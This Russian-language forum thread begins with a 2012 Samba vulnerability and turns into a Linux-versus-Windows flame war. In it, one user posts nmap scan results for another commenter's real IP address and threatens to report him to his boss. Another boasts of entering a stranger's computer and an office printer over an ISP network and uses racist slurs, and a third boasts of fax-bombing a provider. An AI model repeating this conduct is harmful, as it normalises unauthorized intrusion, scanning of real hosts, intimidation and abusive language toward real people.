Прелестно! Анонимный юзер отправкой специального пакета может угасить кучу Linux серверов! Что еще можно желать?

Да уж, такой мегабИзапасный линух. Хотя... причем здесь линух, правда, упоротые рукожопые макаки??? Это ведь кривая самба, но без которой линух вобще нах никому не вперся, даже в качестве сервера. :)

Opennet 22:48 написал:
В Samba устранена одна из самых опасных уязвимостей за всю историю проекта

Luca 22:52 написал:
Samba самая опасная уязвимость за всю историю проекта!

Бгггг... Как ты, однако, оперативно отреагировал! Наверное, бежал вприпрыжку от радости, Luca?
Хреновая уязвимость, конечно. Только я не понял, Luca, как у тебя такое получается:

Luca написал:
Представлена внеплановая порция обновлений Samba - 3.6.4, 3.5.14 и 3.4.16, в которых устранена критическая уязвимость

Opennet написал:
Проблеме подвержены все версии Samba с 3.0.x по 3.6.3 включительно. Всем пользователям Samba рекомендуется в экстренном порядке провести обновление до представленных корректирующих выпусков. Для уже не поддерживаемых веток Samba подготовлены патчи.

Luca написал:
Патча пока нет. Уязвимы все дистрибутивы Linux с установленной Samba.

??????

pavel2403 написал:
Это ведь кривая самба

Пашок, ну Samba и впрямь х№рня полная! И ведь полностью от неё не избавишься, её клиент имеет жёсткие зависимости с основными пакетами системы!

Ололо дырявая поделка. Хорошо что я использую только Windows 7, самую безопасную ос в мире!

Apollo 11 написал:
Пашок, ну Samba и впрямь х№рня полная! И ведь полностью от неё не избавишься, её клиент имеет жёсткие зависимости с основными пакетами системы!

Спасибо Кэп, тебе обязательно надо было пересказать мой пост своими словами? В чем смысл?

Apollo 11 написал:
Только я не понял, Luca, как у тебя такое получается:

Дык так же на ОпенНете написано. Что не так-то?

Luca, где сплойт?
---
Без него остаётся только попой тарахтеть -)

pavel2403 написал:
Спасибо Кэп, тебе обязательно надо было пересказать мой пост своими словами? В чем смысл?

А ты уверен, что я твой пост пересказал? Перечитай мой коммент внимательно. Глядишь, и откроется тебе великая мудрость, глаголящая моими устами.

Luca написал:
Дык так же на ОпенНете написано. Что не так-то?

На Opennet'е написано, что "патча пока нет"? Что-то я там не нашёл такой фразы. Как раз, наоборот, на Opennet'е пишут о наличии патчей для неподдерживаемых веток Samba. А ты умудряешься в начале новости написать о внеплановой "порции" обновлений Samba, в которой устранена критическая уязвимость, и тут же, ниже заявляешь, что "патча пока нет". Как такое понимать? На Opennet'e, кстати, рекомендуют экстренно обновиться до версии 3.6.4. Или ты имел в виду, что отсутствуют собранные пакеты для популярных дистрибутивов?

Apollo 11 написал:
А ты уверен, что я твой пост пересказал? Перечитай мой коммент внимательно. Глядишь, и откроется тебе великая мудрость, глаголящая моими устами.

Гы, троллейбус, я же тебе не новичок слора, чтобы ты мог так примитивно меня потроллить, у тебя это и в лучшие времена то не получалось. Ты лучше скажи, чем твой пост принципиально отличается от мего, ты ведь так и не ответил, так что давай ка по-порядку, ок?

Apollo 11 написал:
на Opennet'е пишут о наличии патчей для неподдерживаемых веток Samba.

А для поддерживаемых?

pavel2403 написал:
Гы, троллейбус, я же тебе не новичок слора, чтобы ты мог так примитивно меня потроллить, у тебя это и в лучшие времена то не получалось.

Пашок, ни в коем случае! Ты о чём? Какой троллинг? О_о!

pavel2403 написал:
Ты лучше скажи, чем твой пост принципиально отличается от мего, ты ведь так и не ответил, так что давай ка по-порядку, ок?

Без проблем. Ты написАл, что Linux без Samba типа_нах_никому_не_нужен, даже в качестве сервера. Я к этому добавил, что от Sambа'ы в Linux'е вообще сложно избавиться, поскольку её клиент намертво впаян в систему по зависимостям. Соответственно, многие (если не все) дыры Samba'ы могут быть актуальны и для клиента. Даже в том случае, если тебе лично Samba нах_не_впёрлась. Я, например, ею не пользуюсь. Вместо Samba всегда использовал NFS. Но клиент стоИт. И избавиться от него можно только с помощью --force.

pavel2403 написал:
А для поддерживаемых?

Ну, так сходи по ссылкам, посмотри. Как ты думаешь, если разработчики позаботились сделать патчи даже для неподдерживаемых веток, неужели они оставят без патчей ветки поддерживаемые? Другое дело, что пакетов собранных для популярных дистрибутивов пока нет. Но решение-то есть. А Luca опять нафантазировал, что патчей вообще не существует.

Угу, только виндузятники так скромно молчат о найденной серьёзной уязвимости ms12-020. Сплойт тут http://www.securitylab.ru/poc/extra/421792.php. Вот это я пониманию, уязвимость -) А что до самбы, так она в сетях нужна только виндовым клиентам, т.к. win -машины без костылей другие протоколы не поддерживают (например sshfs). Короче, виндовые админы, кроме как "расшарить" и не умеют больше нифига, в основной своей массе -) За что их и имели в задницу через ms08-67 =)))

А у кого-то Samba смотрит в инет? А зачем?

Rector, Вы, простите, куда смотрите-то? На ZDI описание вышло аж 15 марта, а заплатка от MS аж 12 марта. Вы чем хотели удивить-то? Или, по-Вашему, уязвимость еще не закрыта?

kenzzzooo написал:
уязвимость еще не закрыта?

Теоретически да, закрыта. А практически, порядка 30-40% серверов, в Интернете по крайней мере, уязвимы до сих пор.

Это можете легко проверить например в сети своего провайдера.

в сети Beeline? и как, если не секрет, я это проверю? Я проверил это в своей сети (благо есть линукс). Не арбайтен. Да и винда у нас лицензионная, плюс обновления никто не отключал и ставятся они в обязательном порядке (WSUS таки рулит). В другой конторе, которую я курирую до сих пор, хоть и есть RDP, но без VPN к нему не подключится...

nixadmin написал:
А у кого-то Samba смотрит в инет? А зачем?

Вот именно, зачем? Любой админ, в здравом уме никогда не выставит наружу чего не надо выставлять. Это вообще маловероятно. Опасность может исходить только в локалках от "умных" сотрудников.
--
Среди виндузятников так это сплошь и рядом. Ибо мало кто из них знает что делают эти волжебные крыжики на интерфейсах их серверов.


И что здесь писать в этих волшебных настройках -)

kenzzzooo написал:
в сети Beeline?

Да хоть Транстелекома -)
WSUS рулит, базара нет. Но много ли таких контор?

Rector, ну, по себе-то судить не надо. =)) И к вопросу об обновлениях: в винде бинарники уже есть, а вот в линухе пока только сорцы, собранных апдейтов нету. Как Вы думаете, кому проще пропатчиться?

Rector написал:
Вот именно, зачем? Любой админ, в здравом уме никогда не выставит наружу чего не надо выставлять. Это вообще маловероятно. Опасность может исходить только в локалках от "умных" сотрудников.
--
Среди виндузятников так это сплошь и рядом. Ибо мало кто из них знает что делают эти волжебные крыжики на интерфейсах их серверов.

Прикинь, мне эти "волшебные крыжики" тоже влом отключать. А ты меня уже третий год по IP сломать не можешь, видимо, не помогают тебе это.

Вот например - в маленьком диапазоне 80.237.47.128-255 находятся два сервера. Один из них уязвим (50%). Вот так -)

MOP3E, тебе больше пукнуть нечего? Так для чего эти крыжики? Что будет если отключить например второй сверху? Какой порт откроется/закроется?

Белая рысь, найдете мне пару уязвимых серверов с самбой в инете? И да, где сплойт?

kenzzzooo написал:
В другой конторе, которую я курирую до сих пор, хоть и есть RDP, но без VPN к нему не подключится...

В 2008 R2 появился DirectAccess.

Rector написал:
MOP3E, тебе больше пукнуть нечего? Так для чего эти крыжики? Что будет если отключить например второй сверху? Какой порт откроется/закроется?

Пох.й. У мну винда обновляется в автомате. Это ты со своим линухом кирпичи регулярно высираешь. Да, и когда ты уже взломаешь мой комп? Или как всегда - тебе нужно, чтобы я в обязательном порядке сообщил тебе свой "белый" IP и создал учётку одмина без пароля? Линух-хакеры они такие линух-хакеры...

Apollo 11 написал:
И ведь полностью от неё не избавишься, её клиент имеет жёсткие зависимости с основными пакетами системы!

да ладно

<br />equery d samba<br /> * These packages depend on samba:<br />app-misc/mc-4.8.1-r1 (samba ? net-fs/samba)<br />dev-libs/cyrus-sasl-2.1.23-r6 (ntlm_unsupported_patch ? >=net-fs/samba-3.0.9)<br />kde-base/kdebase-kioslaves-4.7.4 (samba ? net-fs/samba[smbclient])<br />kde-base/kopete-4.7.4 (winpopup ? net-fs/samba)<br />net-libs/libsoup-2.36.1 (samba ? net-fs/samba)<br />

Но вот клиента без сервера поставить не получится, да. Правда спасает

<br />/etc/init.d/samba status   <br />    * status: stopped<br />

Luca написал:
Анонимный юзер отправкой специального пакета может угасить кучу Linux серверов!

Список кучи Linux серверов с Samba на борту в студию!

pavel2403 написал:
Это ведь кривая самба, но без которой линух вобще нах никому не вперся, даже в качестве сервера. :)

А чо, NFS уже не канает? Или с ним какие-то проблемы под виндой?

blow05 написал:
equery d samba

Вы не Samba'у смотрите, а smbclient:

y -Qi smbclient<br />...<br />Требуется пакетами    : gnome-vfs  mencoder  mplayer<br />...

gnome-vfs, mplayer... Нет, конечно, можно собрать тот же mplayer без зависимости от клиента Samba'ы, можно и gnome-vfs собрать без этих зависимостей. Но это всё уже отнюдь не тривиальные действия, которые мало кто делает. Сейчас глянул, оказывается gnome-vfs есть для Arch'а без smb:

y -Ss gnome-vfs<br />...<br />aur/gnome-vfs-nosmb 2.24.4-1 (1)<br />...

Как можно убедиться, им пользуется целый один человек. И это не я :)
Samba как таковая у меня, например, вообще не установлена:

y -Qs samba<br />extra/libwbclient 3.6.3-4<br />    Samba winbind client library

Но клиент стоИт как зависимость другого пакета:

y -Qs smbclient<br />extra/smbclient 3.6.3-4<br />    Tools to access a server's filespace and printers via SMB

Может быть, в Gentoo всё по-другому, но в популярных дистрибутивах, вроде Ubuntu или Mint'а, избавиться от Samba'ы совсем — отнюдь не простая задача.

Rector написал:
ms12-020

Тут ещё интереснее есть И реально недавнее.

Walther, сервера 2k3 :)

Apollo 11, так жеж закрыто :)

kenzzzooo написал:
Apollo 11, так жеж закрыто :)

Ну ещё б оно не было закрыто :) Тогда вообще скандал был бы :) Хотя помнится, была какая-то уязвимость, которую не закрывали сколько-то там лет, хотя MS знала о ней. Но гуглить некогда, да и лень. Я к дырам отношусь философски: они будут всегда и везде; главный вопрос — насколько быстро их закрывают. Поэтому восторги местной братии по поводу дыр в приложениях для Linux'а у меня вызывают лёгкое... умиление

Apollo 11 написал:
Вы не Samba'у смотрите, а smbclient:

Apollo 11 написал:
Может быть, в Gentoo всё по-другому

Да, тут smbclient не ставится отдельно, он - всего лишь USE у samba

<br /> if use smbclient ; then<br />                einfo "make smbclient library"<br />                emake libsmbclient<br />        fi<br /><br />...<br /><br />     if use smbclient ; then<br />                einfo "install smbclient library"<br />                emake installlibsmbclient DESTDIR="${D}"<br />        fi<br /><br />

А gmome-vfs, mencoder, mplayer и т.д. можно собрать и без поддержки samba стандартными средствами.... Только вот уязвимость все-таки в сервере, а не в клиенте, и если сервер остановлен - то проблем быть не должно.

Rector написал:
Что будет если отключить например второй сверху? Какой порт откроется/закроется?

Дык, если не ошибаюсь, их цельных 4, 137Г·139 и 445. Где-то 80% виндюков ими зачем то наружу светят. Проверено в локальной подсетке своего провайдера.

blow05 написал:
А gmome-vfs, mencoder, mplayer и т.д. можно собрать и без поддержки samba стандартными средствами....

Можно. В Gentoo и не такое можно. В принципе, и в Arch'е можно через ABS. Но в пакетных дистрибутивах Samba (либо её клиент) прибита гвоздями. И чтобы её отодрать, придётся пересобрать полсистемы. Утрирую, конечно, но, в принципе, не далеко от реальности.

blow05 написал:
Только вот уязвимость все-таки в сервере, а не в клиенте, и если сервер остановлен - то проблем быть не должно.

В данном случае да, в сервере. Но Samba — сама по себе дырявая поделка, пользоваться которой небезопасно. Помнится, года полтора назад обнаруживали уязвимость, которая была актуальна не только для сервера, но и для клиента. И такой случай, к сожалению, не единичный. Причём, в реализации SMB-протокола под Виндой тоже постоянно находят убойные дыры. Так что, ИМХО, нафиг эту Sambа'у вообще. Лучше пользоваться NFS.

Apollo 11, да то ерунда. Нормального сплойта так и не было.
ikkunan salvataja, ну вот подсказал! Теперь Морзе откроется Виндовсистина -))

Apollo 11 написал:
Лучше пользоваться NFS.

NFS небезопасен, к сожалению. Можно применять только в доверенных сетях. Лучше sshfs, imho.
--
Кстати, насчет NFS...Нередко встречаю в Сети открытый наружу. Хотя...это проблемы тех админов что голую задницу свою в открытое окно выставили ;-)

Apollo 11 написал:
Тут ещё интереснее есть biggrin И реально недавнее.

Всего терабайт исходящего траффика - и виндовый сервер взломан! Ламерок, ты действительно веришь, что эту уязвимость можно воспроизвести хоть где-то кроме лаборатории?

Apollo 11 написал:
Samba — сама по себе дырявая поделка, пользоваться которой небезопасно.

А чего енто она дырявая? "Швабодка" потому что?

MOP3E, так ты на счет первого крыжика на моём скриншоте скажешь что? Или сольёшься? -)

Rector написал:
Теперь Морзе откроется Виндовсистина -))

Она мне уже давно открылась. Ламеры вроде тебя с аполлошей в принципе неспособны взломать хоть что-то.

Rector написал:
MOP3E, так ты на счет первого крыжика на моём скриншоте скажешь что? Или сольёшься? -)

Так как насчёт взлома моего компа скажешь что? Или уже давно слился?

MOP3E, Ты заеб№л. Что там у тебя ломать? Твою домашнюю машину, которая сидит за линукс-роутером. Или ты напрямую поднимаешь соединение? В любом случае твоя машинка глухо прикрыта фаерволом и никакие демоны наружу не работают. Верно?
--
Так что там ломать? -))

Rector написал:
MOP3E, Ты заеб№л. Что там у тебя ломать? Твою домашнюю машину, которая сидит за линукс-роутером. Или ты напрямую поднимаешь соединение? В любом случае твоя машинка глухо прикрыта фаерволом и никакие демоны наружу не работают. Верно?
--
Так что там ломать? -))

Вот и расскажи, что ты там ломаешь последние три года? Или признай, что слился, тогда я тебе об этом фэйле напоминать перестану.

Rector написал:
Так что там ломать? -))

Взломай лучше меня, реально белый адрес и реально мое МП на этом глобусе:

Skynet2015, ты двурушник. И честно говоря, я таких как ты презираю. Но ладно, это так, лирическое отступление.
--
Морзе, ты лучше вот что...меньше знаешь лучше спишь. Яволь? Продолжай изучать порты TCP.
Как поднимешь ISS (только серьёзно, с контентом), вот тогда добро пожаловать в мои сети. Тоже яволь?

Skynet2015 написал:
Взломай лучше меня, реально белый адрес и реально мое МП на этом глобусе

Можно подумать за этим IP скрывается виндюксь, а не циска.

Rector написал:
Skynet2015, ты двурушник. И честно говоря, я таких как ты презираю.

В чем же, если не секрет?
ikkunan salvataja, Именно винда, седня выходной у меня, так что белый ип и никакой циски.
Rector, Ну ломай меня, ломай меня полностью!

Skynet2015 написал:
В чем же, если не секрет?

Ты сам это знаешь. На людях, на своей работе серьёзный человек, ученый, энергетик, специалист. Но гнилой, мало кто знает об этом. Только может кто из женщин и из бывших друзей которых ты кинул. Кроме того, враньё и кидалово у тебя в крови.
--
И там всё таки циска...

 nmap -A 194.190.10.251<br /><br />Starting Nmap 5.21 ( http://nmap.org ) at 2012-04-11 20:02 IRKT<br />Nmap scan report for 194.190.10.251<br />Host is up (0.12s latency).<br />Not shown: 961 closed ports, 37 filtered ports<br />PORT    STATE SERVICE  VERSION<br />22/tcp  open  ssh      Cisco SSH 1.25 (protocol 2.0)<br />443/tcp open  ssl/http Cisco Adaptive Security Appliance http config<br />| html-title: Cisco ASDM 6.4(7)<br />|_Requested resource was http://194.190.10.251/admin/public/index.html<br />Service Info: OS: IOS; Device: security-misc<br /><br />Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .<br />Nmap done: 1 IP address (1 host up) scanned in 177.81 seconds<br />

---
Может твоему начальнику позвонить? И доложить какой ты на самом деле?

Skynet2015 написал:
Именно винда,

На эту винду можно зайти по https и она представится какая она винда.

Rector написал:
Ты сам это знаешь.

нене, не знаю.

Rector написал:
На людях, на своей работе серьёзный человек, ученый, энергетик, специалист.

Ага, а еще я на машинке вышивать умею и фуги баха играю на баллалайке.

Rector написал:
Но гнилой, мало кто знает об этом.

А как ты то узнал? Из совего Иркутска?

Rector написал:
Только может кто из женщин и из бывших друзей которых ты кинул.

Друзей не кидаю, а женщин ебу только, да и то по взаимному согласию.

Rector написал:
Может твоему начальнику позвонить? И доложить какой ты на самом деле?

Позвони, доложи. Он как раз сейчас в иркутскэнерго.
Да, а умение пользоваться nmap и есть твой суперхак?

Skynet2015, заткнись там лучше. Не зли меня...Если я начну работать против тебя, тебе Иркутск раем покажется. Ты меня понял?

Rector написал:
заткнись там лучше. Не зли меня...

Фантомас разбушевался?

Rector написал:
Не зли меня...

А я попробую. Дуель?!

Rector написал:
...Если я начну работать против тебя, тебе Иркутск раем покажется.

Да он мне всегда казался, Байкал прям райское место! А вообще да, ломай меня полностью!

Rector написал:
Ты меня понял?

Иврй дибилизм? Нее, его сложно понять.

Skynet2015, я тебя предупредил.

Rector написал:
Skynet2015, я тебя предупредил.

Ломай меня полностью на дуЕли, ломай! Адрес в Торонто дать, где я живу? А мб реальную страницу на фейсбуке?

Rector написал:
Apollo 11, да то ерунда. Нормального сплойта так и не было.

Да, но зато смешно

МОРЗЕ написал:
"Швабодка" потому что?

"Швабодка" у тебя вместо мозгов. А вообще же, говорил не раз, повторю и сейчас: прежде, чем открывать свой рот, выплюнь х.й. Тогда и шепелявить перестанешь. А то взяли моду: "швабодка", "швабодка". Придурки, бля!

_____________________________________________________

Rector, Skynet, не собачьтесь. Не стОит оно того.

Apollo 11 написал:
Rector, Skynet, не собачьтесь. Не стОит оно того.

Согласен.

ололо прыщецирк, дианон травля!!!1111

Rector написал:
Морзе, ты лучше вот что...меньше знаешь лучше спишь. Яволь? Продолжай изучать порты TCP.
Как поднимешь ISS (только серьёзно, с контентом), вот тогда добро пожаловать в мои сети. Тоже яволь?

Рехтор, ты - тупой хвастливый ламер. Запомни это.

Apollo 11 написал:
"Швабодка" у тебя вместо мозгов.

У меня с мозгами всё в порядке. А вот тебе, похоже, ничего уже не поможет. ЛГМ в терминальной стадии не лечится.

MOP3E написал:
Запомни это.

ОК! В мемориз!
+++
=)))

Охохонюшки! Опять тут Rector отжигает. Попробую отвлечь всех от г№внометания просьбой посоветовать хорошую программу для снятия бэкапов с операционной системы. Требования мизерны: набор папок записать файл, желательно с сжатием. Сейчас пользуюсь tar -zcf, но это не самый удобный способ для обычной домохозяйки

МОРЗЕ написал:
У меня с мозгами всё в порядке.

МОРЗЕ, я бы тебе не советовал употреблять выражение "у меня" и "мозги" в одном предложении. Это, знаешь ли, оксюморон. Гугли значение этого слова.

SemyonKozakov написал:
Попробую отвлечь всех от г№внометания просьбой посоветовать хорошую программу для снятия бэкапов с операционной системы. Требования мизерны: набор папок записать файл, желательно с сжатием. Сейчас пользуюсь tar -zcf, но это не самый удобный способ для обычной домохозяйки

А что мешает использовать Rsync? К нему даже гуёвая морда есть, в которой можно один раз сгенерировать команду со всеми нужными опциями, записАть её в скрипт и пользоваться. Называется, по-моему, GRync.
Достоинства: можно бэкапить "горячую" систему (проверено: всё восстанавливает без проблем); есть сжатие (хотя я им не пользуюсь); можно один раз написать скрипт, закинуть его в cron (или в любой менеджер задач), заставить выдавать вопрос: "Дорогой друХ, не хочешь ли забекапиться?", и потом годами не знать проблем; бекап куда угодно, хоть на сервер, хоть на съёмный носитель. Ну, и т.д. Подробнее здесь.
tar'ом (равно как и dd) я пользовался раньше, пока не надоело грузиться с флешки, чтобы сделать бекап.

"...называется, по-моему, GRync"
"...называется, по-моему, GRsync" //fixed//

SemyonKozakov, http://ru.wikipedia.org/wiki/BackupPC - вроде подходит после установки и настройки. Хотя сам не юзал, но слышал положительные отзывы.

Luca написал:
Прелестно! Анонимный юзер отправкой специального пакета может угасить кучу Linux серверов! Что еще можно желать?

MSBlast сам вспомнишь или напомнить?

Аполоша, дружок, не расскажешь, что происходит на клиенте если вдруг nfs сервер отваливается? А то я как-то замечал, что клиентские машины начинают виснуть намертво, и лечится такое только перезагрузкой, что для сервера, работающего в режиме 24х7, не допустимо в принципе

wr224 написал:
что происходит на клиенте если вдруг nfs сервер отваливается? А то я как-то замечал, что клиентские машины начинают виснуть намертво, и лечится такое только перезагрузкой

Как тебе тяжело живётся Но это, в принципе, не удивительно: ты у нас и swap очищаешь перезагрузкой, так что чо уж тут удивляться-то? И ключи путаешь приватные с публичными. Так что конкретно для тебя рецепт лишь один: перезагрузка, перезагрузка, и ещё раз перезагрузка... А потом, после десяти перезагрузок, — установка Винды. И обретёшь ты, наконец, вожделенное щастье и покой, бедолага ты наш Ынтерпрайзный

Аполош, мне твой тупой линух-троллинг ни разу не интересен, свою дурилку линухом забил, вот и корежит

wr224 написал:
[quote=wr224]что происходит на клиенте если вдруг nfs сервер отваливается? А то я как-то замечал, что клиентские машины начинают виснуть намертво, и лечится такое только перезагрузкой

Не интересен — не читай.
Если серьёзно, то про описанную тобой проблему знаю. Сам не сталкивался, поскольку на домашнем сервере на подобные грабли наступить довольно трудно. Что же касается продакшенов и Ынтерпрайзов, то ты у нас специалист, вот и ищи решение. Если тебе не подходит NFS, — не используй. Делов-то!
Встречал как-то на opennet'е пару статей по поводу NFS и проблем с зависаниями при отваливании сервера, вроде бы, частично можно решить soft-монтированием. Но терминал зависать будет. Повторяю: я сам с этим не сталкивался, поэтому (если без троллинга и стёба) ничего тебе посоветовать не могу.
По поводу же того, чем забит мой мозг, ты этого не знаешь и знать не можешь. Так что, если не хочешь троллинга, не неси околесицу сам.

Сюрьезный Аполоша мне больше лайк. Ну так если есть такая проблема нехай нфс, недопиленный санками и похоже уже не будет допиленный никогда саопчеством, вместо смб предлагать.

Apollo 11 написал:
Так что, ИМХО, нафиг эту Sambа'у вообще. Лучше пользоваться NFS.

Да ты молодец конечно, только сможешь музыку по сети послушать или фильму посмотреть используя NFS? А так да, NFS рулит в линухе по сравнению с самбой. :)

wr224 написал:
Сюрьезный Аполоша мне больше лайк.

Вот мне откровенно пофигу, на что у тебя "лайк", а на что "нелайк". Сюрьёзным быть скучно. Мне и на работе сюрьёзности хватает.

wr224 написал:
Ну так если есть такая проблема нехай нфс, недопиленный санками и похоже уже не будет допиленный никогда саопчеством, вместо смб предлагать.

А кто тебе его предлагает? Я могу предложить тебе способ почистить swap без перезагрузки, а NFS я использую сам и никому его не предлагаю. Или ты слово "ИМХО" не заметил? Ну, так я его для Ынтерпрайзов с МОРЗами в компании специально большими буквами написал (или надо было два раза написАть, чтобы даже ты понял?). Вон, Rector выше просто написал, что NFS небезопасен, так с ним никто и спорить не стал. А тебе, значиццо, поумничать захотелось, да? Свои прошлые баттх№рты из-за ключей, да swap'ов залечить? Ну-ну, порадуйся хоть чуть-чуть в серой своей жизни Ынтерпрайзной: одолел ты меня, одолел Других-то радостей у тебя нет.

pavel2403 написал:
Да ты молодец конечно, только сможешь музыку по сети послушать или фильму посмотреть используя NFS? А так да, NFS рулит в линухе по сравнению с самбой. :)

А почему нет, Пашок? Именно это и делаю иногда ("иногда" потому, что вообще редко слушаю музыку, а фильмы если и смотрю, то в основном документальные).
А чем тебе Samba в Linux'е не нравиццо? Работает, нормально, вроде. Только дырявая слегка :)

ikkunan salvataja написал:
Где-то 80% виндюков ими зачем то наружу светят. Проверено в локальной подсетке своего провайдера.

Понимаешь, Акуна, это 80 % долбоебов светят, и только потому что им нужны шары для домашней сети, а на коробочке D-Link включить файер и настроить его им мозгов не хватает, это так сказать издержки удобства пользования виндой, как-то одно время у какой-то тетки я по лок. сети провайдера изучил все содержимое её компа и послание оставил ввиде текстовика, что она дура. Через 2 недели появился эффект, она закрылась :) тоже самое, только чуть ранее произошло с какой-то стр№ховой г№вноконторой, там я тоже сообщение оставил, только они среагировли быстрее, потому что это послание я им распечатал прямо на принтер. :) Гы, представляю как они обосрались... меня на ха-ха еще дней 5 пробивало.

pavel2403 написал:
как-то одно время у какой-то тетки я по лок. сети провайдера изучил все содержимое её компа и послание оставил ввиде текстовика, что она дура. Через 2 недели появился эффект, она закрылась :) тоже самое, только чуть ранее произошло с какой-то стр№ховой г№вноконторой, там я тоже сообщение оставил, только они среагировли быстрее, потому что это послание я им распечатал прямо на принтер. :) Гы, представляю как они обосрались... меня на ха-ха еще дней 5 пробивало.

Пашок, да ты у нас злобный хацкер! :) Это не ты, кстати, Anonymos'ов разогнал? Может, и им тоже на принтер послание сбросил?
С г№вноконторой хр№н с ней, а вот зачем тётку обидел? Или тебя в армии не научили, что заигрывать с тётками надо с пряниками портвейном шампанским, цветами и конфетами?

Skynet2015 написал:
Rector, Ну ломай меня, ломай меня полностью!

Гы-Гы::: http://youtu.be/hBMhY1s58kc

Rector написал:
Может твоему начальнику позвонить? И доложить какой ты на самом деле?

О, Ректор, ты модернизорал nMap и он теперь после сканирования телефоны начальников выдает? О_о!!!

Apollo 11 написал:
"...называется, по-моему, GRsync"

Только перевод кривоватый, но разобрать можно.

Apollo 11 написал:
А чем тебе Samba в Linux'е не нравиццо?

Дык... я против самбы того, тоже ничего не имею, мне линух весь не нравиться, а самба в строю, такая же глючная. Просто как ты будешь без монтирования каталога с файлами на NFS фильму то смотреть без самбы по сети? неужто луноходные плееры это научились делать по NFS?

Apollo 11 написал:
Пашок, да ты у нас злобный хацкер!

Каюсь, баловался, но уже в завязке.

Apollo 11 написал:
Это не ты, кстати, Anonymos'ов разогнал? Может, и им тоже на принтер послание сбросил?

Не, не я, точно, клянусь!

Apollo 11 написал:
Или тебя в армии не научили, что заигрывать с тётками надо с пряниками портвейном шампанским, цветами и конфетами?

Опять правда твоя, троллейбус(тяжко вздыхает), только это... она толстая была там же я еще и фотки её видел, с каким-то черножопым уродом, вот и решил похулиганить. и да, толстых не люблю, а черножопых еще больше.

pavel2403 написал:
а на коробочке D-Link включить файер и настроить его им мозгов не хватает

pavel2403 написал:
как-то одно время у какой-то тетки я по лок. сети провайдера изучил все содержимое её компа

Подозреваю, что D-link'а у тетки не было. Интернет входил внутривенно.

pavel2403 написал:
Через 2 недели появился эффект, она закрылась :)

Она поставила антивирус с антихакером.

pavel2403 написал:
это так сказать издержки удобства пользования виндой

Нет. Это недостаток образования и избыток уверенности, что "у меня все должно работать с первого тыка".

Павел написал:
Подозреваю, что D-link'а у тетки не было. Интернет входил внутривенно.

Не совсем, дело в том, что эти коробочки продаются с отключенным по умолчанию файером, с одной стороны удобно, воткнул- и все работает, а с другой, вон оно -то как бывает.

Павел написал:
Это недостаток образования и избыток уверенности, что "у меня все должно работать с первого тыка".

Ну дык и я о том же.

Павел написал:
Она поставила антивирус с антихакером.

возможно, но в сети уже её комп не светился.

Apollo 11 написал:
МОРЗЕ, я бы тебе не советовал употреблять выражение "у меня" и "мозги" в одном предложении. Это, знаешь ли, оксюморон. Гугли значение этого слова.

Хорошо, аполлоша, я больше не буду говорить про твои мозги одним предложением.

pavel2403 написал:
О, Ректор, ты модернизорал nMap и он теперь после сканирования телефоны начальников выдает? О_о!!!

Да Паша. Специальным скриптом -))

pavel2403 написал:
только они среагировли быстрее, потому что это послание я им распечатал прямо на принтер. :)

-)) Во времена факсов с термобумагой, я сжег ему печку в конторе одного гавнопровайдера, отправив ему Малевича листов 300 -))

pavel2403 написал:
Не совсем, дело в том, что эти коробочки продаются с отключенным по умолчанию файером, с одной стороны удобно, воткнул- и все работает, а с другой, вон оно -то как бывает.

А порты через д-линковский нат форвардятся тоже автоматом? Или тётя смогла роутинг на свою машину с фотками организовать? Что-то, Павеликспертвсетевыхтехнологиях, Вы не договариваете, похоже, таки, был контакт с "мечтой поэта".

straus написал:
А порты через д-линковский нат форвардятся тоже автоматом? Или тётя смогла роутинг на свою машину с фотками организовать?

Врядли, я не в курсе, собсна, каким образом у неё был организован доступ, возможно там стоял обычный Switch, а может и вобще

Павел написал:
Интернет входил внутривенно

История как говориться об этом умалчивает.

straus написал:
похоже, таки, был контакт с "мечтой поэта".

Ну фи, что за бред вы несете, как вы посмели... подумать про меня такое

Rector написал:
Во времена факсов с термобумагой

А сейчас они на чем, разве там не та же самая термобумага? Или имеется ввиду какой нибуль МФУ?

pavel2403 написал:
А сейчас они на чем, разве там не та же самая термобумага?

Да сейчас в основном обычная. Сам понимаешь, качество лучше и документ один к одному.

Rector написал:
Белая рысь, найдете мне пару уязвимых серверов с самбой в инете? И да, где сплойт?

Не могу. =( Один из этих самых серверов я около полугода назад убил. А шерстить весь инет на предмет наличия поделия - увольте, я ж не упоротый. А где сплойт - Вы узнаете, когда Ваш сервер уронят.

null666 написал:
MSBlast сам вспомнишь или напомнить?

Да, напомните нам про очередной вирус, написанный по горячим следам выпущенных MS заплаток. ;)

Цитата:
Code Red - 2001 год. Использовал уязвимость MS01-033, обновление закрывающее её было выпущено за месяц до эпидемии.
Blaster - 2003 год. Уязвимости MS03-026 и MS03-039. Исправления доступны за месяц до эпидемии.
Conficker - эпидемия началась в 2009 году. Использует уязвимость MS08-067, исправление доступно в октябре прошлого года.
Это лишь самые известные эпидемии.

Белая рысь написал:
А где сплойт - Вы узнаете, когда Ваш сервер уронят.

У меня на серверах самба не используется -)

Белая рысь написал:
А шерстить весь инет на предмет наличия поделия - увольте, я ж не упоротый

Самый прикол в том что начнёшь его шерстить, так только виндовые машинки и светят дырявыми сервисами -)) Вот например в сетушке Skynet'а, сидит некая машинка виндовая-серверок ;-) И что там только на ней нет -)) даже телефония поднята и DameWare и Microsoft Terminal Service. Рули не хочу -)) Особенно прикольно что RDP на ней дырявый -))

Rector написал:
Вот например в сетушке Skynet'а, сидит некая машинка виндовая-серверок ;-) И что там только на ней нет -)) даже телефония поднята и DameWare и Microsoft Terminal Service. Рули не хочу -)) Особенно прикольно что RDP на ней дырявый -))

ыыыыы, рехур, ты решил показать что ты меня типа хакнул. Ой дибилушко ты все таки, дибилушко!

Rector написал:
некая машинка виндовая-серверок

Прикинт и не одна... а много, да! Так что пальцем в жопу раз.

Rector написал:
даже телефония поднята

У нас нет IP телефонии, мудень, у нас свои АТС, работающие через ЕЭСовские коммутаторы.

Rector написал:
DameWare и Microsoft Terminal Service

Бля, а у кого их нет, типа козырнулся.

Rector написал:
Особенно прикольно что RDP на ней дырявый

Точно гиперболойдом часть мозга удалили.
Ректор, ломай меня, ломай меня по ип полностью. Лечи свой батх№рт и да, жду про себя полный доклад, я разрешаю его выложить в общий доступ.

Rector написал:
Самый прикол в том что начнёшь его шерстить, так только виндовые машинки и светят дырявыми сервисами -))

Что самое парадоксальное - работают. =)) Линукс-сервер - это одна-две задачи (шлюз + http, например) А тут вон скока всего, при чём, всё это поднял какой-то школьник, даже не отключивший общие папки наружу. =))

Белая рысь написал:
тут вон скока всего, при чём, всё это поднял какой-то школьник, даже не отключивший общие папки наружу. =))

